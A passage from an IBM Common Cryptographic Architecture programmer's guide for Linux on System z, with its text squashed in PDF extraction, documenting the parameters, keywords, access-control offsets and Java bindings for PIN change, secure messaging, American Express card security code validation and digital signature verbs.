label name or internal token of a PIN encrypting key that is to be used to decrypt the +new_reference_PIN_block. This must be an IPINENC or OPINENC key. If the label name is supplied, +the name must be unique in the DES key storage file. +new_reference_PIN_block +Direction: Input Type: String +This is an 8-byte field that contains the enciphered PIN block of the new PIN. +new_reference_PIN_profile +Direction: Input Type: String +This is a 24-byte field that contains three 8-byte elements with a PIN block format keyword, a format +control keyword (NONE), and a pad digit as required by certain formats. +new_reference_PIN_PAN_data +Direction: Input Type: String +This is a 12-byte field containing PAN in character format. This data might be needed to recover the +new reference PIN if the format is ISO-0, ISO-3, or VISA-4. If neither is used, this parameter might be +blanks. +For ISO-0 or ISO-3, use the rightmost 12 digits of the PAN, excluding the check digit. For VISA-4, use +the leftmost 12 digits of the PAN, excluding the check digit. +current_reference_PIN_key_length +Direction: Input Type: Integer +The length of the current_reference_PIN_key_identifier parameter. For the current implementation, the +value must be 64. If the rule_array contains VISAPCU1, this value must be 0. +current_reference_PIN_key_identifier +Direction: Input/Output Type: String +The label name or internal token of a PIN encrypting key that is to be used to decrypt the +current_reference_PIN_block. This must be an IPINENC or OPINENC key. If the label name is +supplied, the name must be unique in the key storage. If the rule_array contains VISAPCU1, this value +is ignored. +current_reference_PIN_block +Direction: Input Type: String +This is an 8-byte field that contains the enciphered PIN block of the new PIN. If the rule_array +contains VISAPCU1, this value is ignored. +current_reference_PIN_profile +344 LinuxforSystemz: SecureKeySolutionwiththeCommonCryptographicArchitectureApplicationProgrammer'sGuide + +PIN Change/Unblock (CSNBPCU) +Direction: Input Type: String +This is a 24-byte field that contains three 8-byte elements with a PIN block format keyword, a format +control keyword (NONE), and a pad digit as required by certain formats. If the rule_array contains +VISAPCU1, this value is ignored. +current_reference_PIN_PAN_data +Direction: Input Type: String +This is a 12-byte field containing PAN in character format. This data might be needed to recover the +new reference PIN if the format is ISO-0, ISO-3, or VISA-4. If neither is used, this parameter might be +blanks. If the rule_array contains VISAPCU1, this value is ignored. +For ISO-0 or ISO-3, use the rightmost 12 digits of the PAN, excluding the check digit. For VISA-4, use +the leftmost 12 digits of the PAN, excluding the check digit. +output_PIN_data_length +Direction: Input Type: Integer +Currently this field is reserved. This value must be 0. +output_PIN_data +Direction: Input Type: String +This parameter is ignored. +output_PIN_profile +Direction: Input Type: String +This is a 24-byte field that contains three 8-byte elements with a PIN block format keyword +(VISAPCU1 or VISCPU2), a format control keyword (NONE), and eight bytes of spaces. +output_PIN_message_length +Direction: Input/Output Type: Integer +The length of the output_PIN_message field. Currently the value must be a minimum of 16. +output_PIN_message +Direction: Output Type: String +The reformatted PIN block with the new reference PIN enciphered under the SMPIN session key. +Restrictions +None +Required commands +This verb requires the following commands to be enabled in the active role based on the permissible +key-type, IPINENC or OPINENC, used in the decryption of the input PIN blocks. +|| +PIN-block +| encrypting +|||| key-type Offset Command Comment +|||| OPINENC X'00BC' PINChange/Unblock-changeEMV Requiredifeitherthe +|| PINwithOPINENC new_reference_PIN_keyorthe +| current_reference_PIN_keyare +| permittedtobeanOPINENCkey +| type. +Chapter9.Financialservices 345 + +PIN Change/Unblock (CSNBPCU) +| PIN-block +| encrypting +|||| key-type Offset Command Comment +|||| IPINENC X'00BD' PINChange/Unblock-changeEMV Requiredifeitherthe +|| PINwithIPINENC new_reference_PIN_keyorthe +| current_reference_PIN_keyare +| permittedtobeanIPINENCkey +| type. +| +| When a MAC-MDK or an ENC-MDK of key type DKYGENKY is specified with control vector bits (19 - 22) +| of B'1111', the Diversified Key Generate - DKYGENKY - DALLcommand (offset X'0290') must also be +| enabled in the active role. +Note: Arole with offset X'0290' enabled can also use the Diversified Key Generate verb with a DALLkey. +| An enhanced PIN security mode is available for extracting PINs from a 3621 or 3624 encrypted PIN-block +| using the PADDIGIT PIN-extraction method. This mode limits checking of the PIN to decimal digits, and a +| minimum PIN length of 4 is enforced; no other PIN-block consistency checking will occur. To activate this +| mode, enable the PTR Enhanced PIN Security command (offset X'0313') in the active role. +Usage notes +There are additional access points for this verb. +JNI version +This verb has a Java Native Interface (JNI) version, which is named CSNBPCUJ. See “Building Java +applications to use with the CCAJNI” on page 16. +The parameters for CSNBPCUJ are shown here. +346 LinuxforSystemz: SecureKeySolutionwiththeCommonCryptographicArchitectureApplicationProgrammer'sGuide + +PIN Change/Unblock (CSNBPCU) +Format +public native void CSNBPCUJ( +hikmNativeInteger return_code, +hikmNativeInteger reason_code, +hikmNativeInteger exit_data_length, +byte[] exit_data, +hikmNativeInteger rule_array_count, +byte[] rule_array, +hikmNativeInteger authenticationMasterKeyLength, +byte[] authenticationMasterKey, +hikmNativeInteger issuerMasterKeyLength, +byte[] issuerMasterKey, +hikmNativeInteger keyGenerationDataLength, +byte[] keyGenerationData, +hikmNativeInteger newRefPinKeyLength, +byte[] newRefPinKey, +byte[] newRefPinBlock, +byte[] newRefPinProfile, +byte[] newRefPanData, +hikmNativeInteger currentRefPinKeyLength, +byte[] currentRefPinKey, +byte[] currentRefPinBlock, +byte[] currentRefPinProfile, +byte[] currentRefPanData, +hikmNativeInteger outputPinDataLength, +byte[] outputPinData, +byte[] outputPinProfile, +hikmNativeInteger outputPinMessageLength, +byte[] outputPinMessage); +Chapter9.Financialservices 347 + +Secure Messaging for Keys (CSNBSKY) +Secure Messaging for Keys (CSNBSKY) +The Secure Messaging for Keys verb will encrypt a text block including a clear key value decrypted from +an internal or external DES token. The text block is normally a "Value" field of a secure message TLV +(Tag/Length/Value) element of a secure message. TLV is defined in ISO/IEC 7816-4. +Format +CSNBSKY( +return_code, +reason_code, +exit_data_length, +exit_data, +rule_array_count, +rule_array, +input_key_identifier, +key_encrypting_key_identifier, +secmsg_key_identifier, +text_length, +clear_text, +initialization_vector, +key_offset, +key_offset_field_length, +enciphered_text, +output_chaining_vector ) +Parameters +For the definitions of the return_code, reason_code, exit_data_length, and exit_data parameters, see +“Parameters common to all verbs” on page 14. +rule_array_count +Direction: Input Type: Integer +Apointer to an integer variable containing the number of elements in the rule_array variable. This +value must be 0 or 1. +rule_array +Direction: Input Type: String +Keywords that provide control information to the verb. The processing method is the encryption mode +used to encrypt the message. The rule_array keywords are described in Table97. +Table97.KeywordsforSecureMessagingforKeyscontrolinformation +Keyword Description +| Encipheringmode(One,optional) +TDES-CBC UseCBCmodetoencipherthemessage(default). +TDES-ECB UseEBCmodetoencipherthemessage. +input_key_identifier +Direction: Input/Output Type: String +The internal token, external token, or key label of an internal token of a double length DES key. The +key is recovered in the clear and placed in the text to be encrypted. The control vector of the DES key +must not prohibit export. +key_encrypting_key_identifier +Direction: Input/Output Type: String +348 LinuxforSystemz: SecureKeySolutionwiththeCommonCryptographicArchitectureApplicationProgrammer'sGuide + +Secure Messaging for Keys (CSNBSKY) +If the input_key_identifier is an external token, this parameter is the internal token or the key label of +the internal token of IMPORTER or EXPORTER. If it is not, it is a null token. If a key label is specified, +the key label must be unique. +secmsg_key_identifier +Direction: Input/Output Type: String +The internal token or key label of a secure message key for encrypting keys. This key is used to +encrypt the updated clear_text containing the recovered DES key. +text_length +Direction: Input Type: Integer +The length of the clear_text parameter. Length must be a multiple of eight. Maximum length is 4K. +clear_text +Direction: Input Type: String +Clear text that contains the recovered DES key at the offset specified and is then encrypted.Any +padding or formatting of the message must be done by the caller on input. +initialization_vector +Direction: Input Type: String +The 8-byte supplied string for the TDES-CBC mode of encryption. The initialization_vector is XORed +with the first eight bytes of clear_text before encryption. This field is ignored for TDES-ECB mode. +key_offset +Direction: Input Type: Integer +The offset within the clear_text parameter at key_offset where the recovered clear input_key_identifier +value is to be placed. The first byte of the clear_text field is offset 0. +key_offset_field_length +Direction: Input Type: Integer +The length of the field within clear_text parameter at key_offset where the recovered clear +input_key_identifier value is to be placed. Length must be a multiple of eight and is equal to the key +length of the recovered key. The key must fit entirely within the clear_text. +enciphered_text +Direction: Output Type: String +The field where the enciphered text is returned. The length of this field must be at least as long as the +clear_text field. +output_chaining_vector +Direction: Output Type: String +This field contains the last eight bytes of enciphered text and is used as the initialization_vector for the +next encryption call if data needs to be chained for TDES-CBC mode. No data is returned for +TDES-ECB. +Restrictions +None +Required commands +This verb requires the Secure Messaging for Keys command (offset X'0273') to be enabled in the active +role. +Chapter9.Financialservices 349 + +Secure Messaging for Keys (CSNBSKY) +Usage notes +Keys appear in the clear only within the secure boundary of the cryptographic coprocessor, and never in +host storage. +JNI version +This verb has a Java Native Interface (JNI) version, which is named CSNBSKYJ. See “Building Java +applications to use with the CCAJNI” on page 16. +The parameters for CSNBSKYJ are shown here. +Format +public native void CSNBSKYJ ( +hikmNativeInteger return_code, +hikmNativeInteger reason_code, +hikmNativeInteger exit_data_length, +byte[] exit_data, +hikmNativeInteger rule_array_count, +byte[] rule_array, +byte[] input_key_indentifier, +byte[] key_encrypting_key, +byte[] session_key, +hikmNativeInteger text_length, +byte[] clear_text, +byte[] initialization_vector, +hikmNativeInteger key_offset, +hikmNativeInteger key_offset_field_length, +byte[] cipher_text, +byte[] output_chaining_value); +350 LinuxforSystemz: SecureKeySolutionwiththeCommonCryptographicArchitectureApplicationProgrammer'sGuide + +Secure Messaging for PINs (CSNBSPN) +Secure Messaging for PINs (CSNBSPN) +The Secure Messaging for PINs verb will encrypt a text block including a clear PIN block recovered from +an encrypted PIN block. The input PIN block will be reformatted if the block format in the input_PIN_profile +is different from the block format in the output_PIN_profile. The clear PIN block will only be self encrypted +if the SELFENC keyword is specified in the rule_array. The text block is normally a "Value" field of a +secure message TLV (Tag/Length/Value) element of a secure message. TLV is defined in ISO/IEC 7816-4. +Format +CSNBSPN( +return_code, +reason_code, +exit_data_length, +exit_data, +rule_array_count, +rule_array, +input_PIN_block, +PIN_encrypting_key_identifier, +input_PIN_profile, +input_PAN_data, +secmsg_key_identifier, +output_PIN_profile, +output_PAN_data, +text_length, +clear_text, +initialization_vector, +PIN_offset, +PIN_offset_field_length, +enciphered_text, +output_chaining_vector ) +Parameters +For the definitions of the return_code, reason_code, exit_data_length, and exit_data parameters, see +“Parameters common to all verbs” on page 14. +rule_array_count +Direction: Input Type: Integer +Apointer to an integer variable containing the number of elements in the rule_array variable. This +value must be 0, 1, or 2. +rule_array +Direction: Input Type: String +Keywords that provide control information to the verb. The processing method is the algorithm used to +create the generated key. The keywords are left justified and padded on the right with blanks. The +rule_array keywords are described in Table98. +Table98.KeywordsforSecureMessagingforPINscontrolinformation +Keyword Description +| Encipheringmode(One,optional) +TDES-CBC UseCBCmodetoencipherthemessage(default). +TDES-ECB UseEBCmodetoencipherthemessage. +| PINencryption(One,optional) +CLEARPIN RecoveredclearinputPINblock(mightbereformatted)isplacedintheclearin +themessageforencryptionwiththesecuremessagekey(default). +Chapter9.Financialservices 351 + +Secure Messaging for PINs (CSNBSPN) +Table98.KeywordsforSecureMessagingforPINscontrolinformation (continued) +Keyword Description +SELFENC RecoveredclearinputPINblock(mightbereformatted)isself-encryptedand +thenplacedinthemessageforencryptionwiththesecuremessagekey. +input_PIN_block +Direction: Input Type: String +The 8-byte input PIN block that is to be recovered in the clear and, perhaps, reformatted and then +placed in the clear_text to be encrypted. +PIN_encrypting_key_identifier +Direction: Input/Output Type: String +The internal token or key label of the internal token of the PIN encrypting key used in encrypting the +input_PIN_block. The key must be an IPINENC key. +input_PIN_profile +Direction: Input Type: String +The three 8-byte character elements that contain information necessary to extract the PIN from a +formatted PIN block. The valid input PIN formats are ISO-0, ISO-1, ISO-2, and ISO-3. See “The PIN +profile” on page 307 for additional information. +input_PAN_data +Direction: Input Type: String +The 12 digit personal account number (PAN) if the input PIN format is ISO-0 or ISO-3. Otherwise, the +parameter is ignored. +For ISO-0 or ISO-3, use the rightmost 12 digits of the PAN, excluding the check digit. +secmsg_key_identifier +Direction: Input/Output Type: String +The internal token or key label of an internal token of a secure message key for encrypting PINs. This +key is used to encrypt the updated clear_text. +output_PIN_profile +Direction: Input Type: String +The three 8-byte character elements that contain information necessary to create a formatted PIN +block. If reformatting is not required, the input_PIN_profile and the output_PIN_profile must specify the +same PIN block format. Output PIN block formats supported are ISO-0, ISO-1, ISO-2, and ISO-3. +output_PAN_data +Direction: Input Type: String +The 12 digit personal account number (PAN) if the output PIN format is ISO-0 or ISO-3. Otherwise, +this parameter is ignored. +For ISO-0 or ISO-3, use the rightmost 12 digits of the PAN, excluding the check digit. +text_length +Direction: Input Type: Integer +The length of the clear_text parameter that follows. Length must be a multiple of eight. Maximum +length is 4K. +clear_text +352 LinuxforSystemz: SecureKeySolutionwiththeCommonCryptographicArchitectureApplicationProgrammer'sGuide + +Secure Messaging for PINs (CSNBSPN) +Direction: Input Type: String +Clear text that contains the recovered and/or reformatted/encrypted PIN at offset specified and then +encrypted.Any padding or formatting of the message must be done by the caller on input. +initialization_vector +Direction: Input Type: String +The 8-byte supplied string for the TDES-CBC mode of encryption. The initialization_vector is XORed +with the first eight bytes of clear_text before encryption. This field is ignored for TDES-ECB mode. +PIN_offset +Direction: Input Type: Integer +The offset within the clear_text parameter where the reformatted PIN block is to be placed. The first +byte of the clear_text field is offset 0. +PIN_offset_field_length +Direction: Input Type: Integer +The length of the field within clear_text parameter at PIN_offset where the recovered clear +input_PIN_block value is to be placed. The PIN block might be self-encrypted if requested by the +rule_array. Length must be eight. The PIN block must fit entirely within the clear_text. +enciphered_text +Direction: Output Type: String +The field where the enciphered text is returned. The length of this field must be at least as long as the +clear_text field. +output_chaining_vector +Direction: Output Type: String +This field contains the last eight bytes of enciphered text and is used as the initialization_vector for the +next encryption call if data needs to be chained for TDES-CBC mode. No data is returned for +TDES-ECB. +Restrictions +None +Required commands +This verb requires the Secure Messaging for PINs command (offset X'0274') to be enabled in the active +role. +| Beginning with Release 4.1.0, three new commands are added (offsets X'0350', X'0351', and X'0352'). +| These three commands affect how PIN processing is performed as described below: +| 1. Enable theANSI X9.8 PIN - Enforce PIN block restrictions command (offset X'0350') in the active role +| to apply additional restrictions to PIN processing implemented in CCA4.1.0, as follows: +| v Constrain use of ISO-2 PIN blocks to offline PIN verification and PIN change operations in +| integrated circuit card environments only. Specifically, do not allow ISO-2 input or output PIN blocks. +| v Do not reformat a PIN-block format that includes a PAN into a PIN-block format that does not +| include a PAN. +| v Do not allow a change of PAN data. Specifically, when performing translations between PIN block +| formats that both include PAN data, do not allow the input_PAN_data and output_PAN_data +| variables to be different from the PAN data enciphered in the input PIN block. +Chapter9.Financialservices 353 + +Secure Messaging for PINs (CSNBSPN) +| Note: Arole with offset X'0350' enabled also affects access control of the Clear PIN Generate +| Alternate and the Encrypted PIN Translate verbs. +| 2. Enable theANSI X9.8 PIN -Allow modification of PAN_01_0350 command (offset X'0351') in the active +| role to override the restriction to not allow a change of PAN data. This override is applicable only when +| either theANSI X9.8 PIN - Enforce PIN block restrictions command (offset X'0350') or theANSI X9.8 +| PIN -Allow onlyANSI PIN blocks_01_0350 command (offset X'0352') or both are enabled in the active +| role. This override is to support account number changes in issuing environments. Offset X'0351' has +| no effect if neither offset X'0350' nor offset X'0352' is enabled in the active role. +| Note: Arole with offset X'0351' enabled also affects access control of the Encrypted PIN Translate +| verbs. +| 3. Enable theANSI X9.8 PIN -Allow onlyANSI PIN blocks_01_0350 command (offset X'0352') in the +| active role to apply a more restrictive variation of theANSI X9.8 PIN - Enforce PIN block restrictions +| command (offset X'0350'). In addition to the previously described restrictions of offset X'0350', this +| command also restricts the input_PIN_profile and the output_PIN_profile to contain only ISO-0, ISO-1, +| and ISO-3 PIN block formats. Specifically, the IBM 3624 PIN-block format is not allowed with this +| command. Offset X'0352' overrides offset X'0350'. +| Note: Arole with offset X'0352' enabled also affects access control of the Encrypted PIN Translate +| verbs. +| For more information, see “ANSI X9.8 PIN restrictions” on page 306. +Usage notes +Keys appear in the clear only within the secure boundary of the cryptographic coprocessors, and never in +host storage. +JNI version +This verb has a Java Native Interface (JNI) version, which is named CSNBSPNJ. See “Building Java +applications to use with the CCAJNI” on page 16. +The parameters for CSNBSPNJ are shown here. +Format +public native void CSNBSPNJ ( +hikmNativeInteger return_code, +hikmNativeInteger reason_code, +hikmNativeInteger exit_data_length, +byte[] exit_data, +hikmNativeInteger rule_array_count, +byte[] rule_array, +byte[] in_PIN_blk, +byte[] in_PIN_enc_key_id, +byte[] in_PIN_profile, +byte[] in_PAN_data, +byte[] secmsg_key, +byte[] out_PIN_profile, +byte[] out_PAN_data, +hikmNativeInteger text_length, +byte[] clear_text, +byte[] initialization_vector, +hikmNativeInteger PIN_offset, +hikmNativeInteger PIN_offset_field_length, +byte[] cipher_text, +byte[] output_chaining_value); +354 LinuxforSystemz: SecureKeySolutionwiththeCommonCryptographicArchitectureApplicationProgrammer'sGuide + +Transaction Validation (CSNBTRV) +Transaction Validation (CSNBTRV) +The Transaction Validation verb supports the generation and validation ofAmerican Express card security +codes (CSC). This verb generates and verifies transaction values based on information from the +transaction and a cryptographic key. You select the validation method, and either the generate or verify +mode, through rule_array keywords. +For theAmerican Express process, the control vector supplied with the cryptographic key must indicate a +MAC or MACVER class key. The key can be single or double length. DATAM and DATAMV keys are not +supported. The MAC generate control vector bit must be on (bit 20) if you request CSC generation and +MAC verify bit (bit 21) must be on if you request verification. +Format +CSNBTRV( +return_code, +reason_code, +exit_data_length, +exit_data, +rule_array_count, +rule_array, +transaction_key_identifier_length, +transaction_key_identifier, +transaction_info_length, +transaction_info, +validation_values_length, +validation_values ) +Parameters +For the definitions of the return_code, reason_code, exit_data_length, and exit_data parameters, see +“Parameters common to all verbs” on page 14. +rule_array_count +Direction: Input Type: Integer +Apointer to an integer variable containing the number of elements in the rule_array variable. This +value must be 1 or 2. +rule_array +Direction: Input Type: String +Keywords that provide control information to the verb. The keywords are left-justified in an 8-byte field +and padded on the right with blanks. The keywords must be in contiguous storage. The rule_array +keywords are described in Table99. +Table99.KeywordsforTransactionValidationcontrolinformation +Keyword Description +| AmericanExpresscardsecuritycodes(One,required) +CSC-3 3-digitcardsecuritycode(CSC)locatedonthesignaturepanel.VERIFYimplied.Thisisthedefault. +CSC-4 4-digitcardsecuritycode(CSC)locatedonthesignaturepanel.VERIFYimplied. +CSC-5 5-digitcardsecuritycode(CSC)locatedonthesignaturepanel.VERIFYimplied. +CSC-345 Generate5-byte,4-byte,or3-bytevalueswhengivenanaccountnumberandanexpirationdate. +GENERATEimplied. +| Operation(One,optional) +VERIFY Specifiesverificationofthevaluepresentedinthevalidationvaluesvariable. +Chapter9.Financialservices 355 + +Transaction Validation (CSNBTRV) +Table99.KeywordsforTransactionValidationcontrolinformation (continued) +Keyword Description +GENERATE Specifiesgenerationofthevaluepresentedinthevalidationvaluesvariable. +transaction_key_identifier_length +Direction: Input Type: Integer +The length of the transaction_key_identifier parameter. +transaction_key_identifier +Direction: Input Type: String +The label name or internal token of a MAC or MACVER class key. The key can be single or double +length. +transaction_info_length +Direction: Input Type: Integer +The length of the transaction_info parameter. For theAmerican Express CSC codes, the length must +be 19. +transaction_info +Direction: Input Type: String +ForAmerican Express, this is a 19-byte field containing the concatenation of the 4-byte expiration data +(in the format YYMM) and the 15-byteAmerican Express account number. Provide the information in +character format. +validation_values_length +Direction: Input/Output Type: Integer +The length of the validation_values parameter. Maximum value for this field is 64. +validation_values +Direction: Input Type: String +This variable containsAmerican Express CSC values. The data is output for GENERATE and input for +VERIFY. See Table100. +Table100.ValuesforTransactionValidationvalidation_valuesparameter +Operation Elementdescription +GENERATEandCSC-345 5555544444333where: +55555 = CSC 5 value +4444 = CSC 4 value +333 = CSC 3 value +VERIFYandCSC-3 333=CSC3value +VERIFYandCSC-4 4444=CSC4value +VERIFYandCSC-5 55555=CSC5value +Restrictions +None +356 LinuxforSystemz: SecureKeySolutionwiththeCommonCryptographicArchitectureApplicationProgrammer'sGuide + +Transaction Validation (CSNBTRV) +Required commands +This verb requires the listed commands to be enabled in the active role, depending on the operation and +card security code specified: +|| +Cardsecuritycode +|||| Operationkeyword keyword Offset Command +|||| GENERATE CSC-345 X'0291' TransactionValidation-Generate +|||| VERIFY CSC-3 X'0292' TransactionValidation-VerifyCSC-3 +||| CSC-4 X'0293' TransactionValidation-VerifyCSC-4 +||| CSC-5 X'0294' TransactionValidation-VerifyCSC-5 +| +Usage notes +There are additional access control points for this verb. +JNI version +This verb has a Java Native Interface (JNI) version, which is named CSNBTRVJ. See “Building Java +applications to use with the CCAJNI” on page 16. +The parameters for CSNBTRVJ are shown here. +Format +public native void CSNBTRVJ( +hikmNativeInteger return_code, +hikmNativeInteger reason_code, +hikmNativeInteger exit_data_length, +byte[] exit_data, +hikmNativeInteger rule_array_count, +byte[] rule_array, +hikmNativeInteger transaction_key_length, +byte[] transaction_key, +hikmNativeInteger transaction_info_length, +byte[] transaction_info, +hikmNativeInteger validation_values_length, +byte[] validation_values); +Chapter9.Financialservices 357 + +Transaction Validation (CSNBTRV) +358 LinuxforSystemz: SecureKeySolutionwiththeCommonCryptographicArchitectureApplicationProgrammer'sGuide + +Chapter 10. Using digital signatures +This chapter describes the verbs that support using digital signatures to authenticate messages. +v “Digital Signature Generate (CSNDDSG)” on page 360 +v “Digital Signature Verify (CSNDDSV)” on page 364 +©CopyrightIBMCorp.2007,2011 359 + +Digital Signature Generate (CSNDDSG) +Digital Signature Generate (CSNDDSG) +| This verb generates a digital signature using an RSAor ECC private key. This verb supports the following +| methods: +| v ANSI X9.30 (ECDSA) +| v ANSI X9.31 (RSA) +| v ISO 9796-1 (RSA) +| v RSADSI PKCS 1.0 and 1.1 (RSA) +| v Padding on the left with zeros (RSA) +| Note: The maximum signature length is 512 bytes (4096 bits). +The input text should have been previously hashed using either the One-Way Hash verb or the MDC +Generate verb. If the signature formatting algorithm specifiesANSI X9.31, you must specify the hash +algorithm used to hash the text (SHA-1 or RPMD-160). See “Formatting hashes and keys in public-key +cryptography” on page 513. +You select the method of formatting the text through the rule_array parameter. +| If the PKA_private_key_identifier specifies an RSAprivate key, you select the method of formatting the text +| through the rule_array parameter. If the PKA_private_key_identifier specifies an ECC private key, the ECC +| signature generated is according toANSI X9.30. +Note: For PKCS the message digest and the message-digest algorithm identifier are combined into an +ASN.1 value of type DigestInfo, which is BER-encoded to give an octet string D (see Table101 on +page 361). D is the text string supplied in the hash variable. +Format +CSNDDSG( +return_code, +reason_code, +exit_data_length, +exit_data, +rule_array_count, +rule_array, +PKA_private_key_identifier_length, +PKA_private_key_identifier, +hash_length, +hash, +signature_field_length, +signature_bit_length, +signature_field ) +Parameters +For the definitions of the return_code, reason_code, exit_data_length, and exit_data parameters, see +“Parameters common to all verbs” on page 14. +rule_array_count +Direction: Input Type: Integer +| Apointer to an integer variable containing the number of elements in the rule_array variable. This +| value must be 0, 1, 2, or 3. +rule_array +Direction: Input Type: String +360 LinuxforSystemz: SecureKeySolutionwiththeCommonCryptographicArchitectureApplicationProgrammer'sGuide + +Digital Signature Generate (CSNDDSG) +Keywords that provide control information to the verb.Akeyword specifies the method for calculating +the digital signature. Each keyword is left-justified in an 8-byte field and padded on the right with +blanks.All keywords must be in contiguous storage. The rule_array keywords are described in +Table101. +Table101.KeywordsforDigitalSignatureGeneratecontrolinformation +Keyword Description +| Digitalsignatureformattingmethod(One,optionalandnotvalidwithECDSAkeyword.) +ISO-9796 CalculatethedigitalsignatureonthehashaccordingtoISO-9796-1.Anyhashmethodisallowed. +Thisisthedefault. +PKCS-1.0 CalculatethedigitalsignatureontheBER-encodedASN.1valueofthetypeDigestInfocontaining +thehashaccordingtotheRSADataSecurity,Inc.PublicKeyCryptographyStandards#1block +type00.ThetextmusthavebeenhashedandBER-encodedbeforeinputtothisservice. +PKCS-1.1 CalculatethedigitalsignatureontheBER-encodedASN.1valueofthetypeDigestInfocontaining +thehashaccordingtotheRSADataSecurity,Inc.PublicKeyCryptographyStandards#1block +type01.ThetextmusthavebeenhashedandBER-encodedbeforeinputtothisservice. +ZERO-PAD FormatthehashbypaddingitontheleftwithbinaryzerostothelengthoftheRSAkeymodulus. +Anysupportedhashfunctionisallowed. +X9.31 FormataccordingtotheANSIX9.31standard.Theinputtextmusthavebeenpreviouslyhashed +withoneofthehashalgorithmsspecifiedbelow. +| Hashmethodspecification(One,optional.ValidonlywithX9.31digital-signaturehashformattingmethod.) +RPMD-160 HashtheinputtextusingtheRIPEMD-160hashmethod. +SHA-1 HashtheinputtextusingtheSHA-1hashmethod. +SHA-256 HashtheinputtextusingtheSHA-256hashmethod. +SHA-384 HashtheinputtextusingtheSHA-384hashmethod. +SHA-512 HashtheinputtextusingtheSHA-512hashmethod. +| Tokenalgorithm(One,optional) +|| ECDSA GenerateanECCdigitalsignature.ThiskeywordwasintroducedwithCCA4.1.0.Whenspecified, +| thisistheonlykeywordpermittedintherule_array. +|| RSA GenerateanRSAdigitalsignature.Thisisthedefault.ThiskeywordwasintroducedwithCCA +| 4.1.0. +PKA_private_key_identifier_length +Direction: Input Type: Integer +| The length of the PKA_private_key_identifier field. The maximum size is 3500 bytes. +PKA_private_key_identifier +Direction: Input Type: String +| An internal token or label of the RSAprivate key or retained key. If the signature format is X9.31, the +| modulus of the RSAkey must have a minimum length of 1024 bits or greater. If the signature +| algorithm is ECDSA, this parameter must be a token or label of an ECC private key. +hash_length +Direction: Input Type: Integer +| The length of the hash parameter in bytes. It must be the exact length of the text to sign. The +| maximum size is 512 bytes. If you specify ZERO-PAD in the rule_array parameter, the length is +| restricted to 36 bytes unless the RSAkey is a signature only key, then the maximum length is 512 +| bytes. +Chapter10.Usingdigitalsignatures 361 + +Digital Signature Generate (CSNDDSG) +| On the IBM Eserver zSeries® 990 and subsequent releases, the hash length limit is controlled by a +| new access control point. Only RSAkey management keys are affected by this access control point. +| The limit for RSAsignature use only keys is 512 bytes. This new access control point is always +| disabled in the default role. You must have a TKE workstation to enable it. +hash +Direction: Input Type: String +The application-supplied text on which to generate the signature. The input text must have been +previously hashed, and for PKCS formatting, it must be BER-encoded as previously described. For +X9.31, the hash algorithms must have been either SHA-1 or RIPEMD-160. See the rule_array +parameter for more information. +signature_field_length +|| Direction: Input/Output Type: Integer +| The length in bytes of the signature_field to contain the generated digital signature. The maximum size +| is 512 bytes. +| For RSA, this must be at least the RSAmodulus size (rounded up to a multiple of 32 bytes for the +| X9.31 signature format, or one byte for all other signature formats). +| For RSA, this field is updated with the minimum byte length of the digital signature. +| For ECDSAsignature algorithm, R concatenated with S is the digital signature. The maximum output +| value will be 1042 bits (131 bytes). The size of the signature is determined by the size of P. Both R +| and S will have size P. For prime curves, the maximum size is 2 * 521 bits. For Brainpool curves, the +| maximum size is 2 * 512 bits. +signature_bit_length +Direction: Output Type: Integer +| The bit length of the digital signature generated. For ISO-9796 this is 1 less than the modulus length. +| For other RSAprocessing methods, this is the modulus length. +signature_field +Direction: Output Type: String +The digital signature generated is returned in this field. The digital signature is in the low-order bits +(right-justified) of a string whose length is the minimum number of bytes that can contain the digital +signature. This string is left-justified within the signature_field.Any unused bytes to the right are +undefined. +Restrictions +Although ISO-9796 does not require the input hash to be an integral number of bytes in length, this verb +requires you to specify the hash_length in bytes. +X9.31 requires the RSAtoken to have a minimum modulus bit length of 1024 bits, and the length must +also be a multiple of 256 bits (or 32 bytes). +The length of the hash parameter in bytes. It must be the exact length of the text to sign. The maximum +size is 256 bytes. If you specify ZERO-PAD in the rule_array parameter, the length is restricted to 36 bytes +unless the RSAkey is a signature only key, then the maximum length is 256 bytes. +The hash length limit is controlled by an access control point. If OFF (disabled), the maximum hash length +limit for ZERO-PAD is the modulus length of the PKAprivate key. If ON (enabled), the maximum hash +length limit for ZERO-PAD is 36 bytes. Only RSAkey management keys are affected by this access +control point. The limit for RSAsignature use only keys is 256 bytes. This new access control point is +always disabled in the Default role. You must have a TKE workstation to enable it. +362 LinuxforSystemz: SecureKeySolutionwiththeCommonCryptographicArchitectureApplicationProgrammer'sGuide + +Digital Signature Generate (CSNDDSG) +Required commands +| This verb requires the Digital Signature Generate command (offset X'0100') to be enabled in the active +| role. +| With the use of the DSG ZERO-PAD unrestricted hash length command (offset X'030C'), the hash-length +| restriction does not apply when using ZERO-PAD formatting. +Usage notes +None +JNI version +This verb has a Java Native Interface (JNI) version, which is named CSNDDSGJ. See “Building Java +applications to use with the CCAJNI” on page 16. +The parameters for CSNDDSGJ are shown here. +Format +public native void CSNDDSGJ +( hikmNativeInteger return_code, +hikmNativeInteger reason_code, +hikmNativeInteger exit_data_length, +byte[] exit_data, +hikmNativeInteger rule_array_count, +byte[] rule_array, +hikmNativeInteger PKA_private_key_identifier_length, +byte[] PKA_private_key_identifier, +hikmNativeInteger hash_length, +byte[] hash, +hikmNativeInteger signature_field_length, +hikmNativeInteger signature_bit_length, +byte[] signature_field ); +Chapter10.Usingdigitalsignatures 363 + +Digital Signature Verify (CSNDDSV) +Digital Signature Verify (CSNDDSV) +| This verb verifies a digital signature using an RSAor ECC public key. This verb verifies digital signatures +| generated with these methods: +| v ANSI X9.30 (ECDSA) +| v ANSI X9.31 (RSA) +| v ISO 9796-1 (RSA) +| v RSADSI PKCS 1.0 and 1.1 (RSA) +| v Padding on the left with zeros (RSA) +| This verb can use the RSAor ECC public key, depending on the digital signature algorithm used to +| generate the signature. +| This verb can also use the public keys that are contained in trusted blocks, regardless of whether the +| block also contains rules to govern its use when generating or exporting keys with the Remote Key Export +| verb. The format of the trusted block enables Digital Signature Verify to distinguish it from other RSAkey +| tokens, and therefore no special rule array keyword or other parameters are required in order to indicate +| that the trusted block is being used. However, if the Digital Signature Generate verb is used with the +| TPK-ONLY keyword in the rule_array, an error will occur if the PKA_public_key_identifier does not contain +| a trusted block. +Input text should have been previously hashed. You can use the One-Way Hash verb. See also +“Formatting hashes and keys in public-key cryptography” on page 513. +Note: The maximum signature length is 256 bytes (2048 bits). +Format +CSNDDSV( +return_code, +reason_code, +exit_data_length, +exit_data, +rule_array_count, +rule_array, +PKA_public_key_identifier_length, 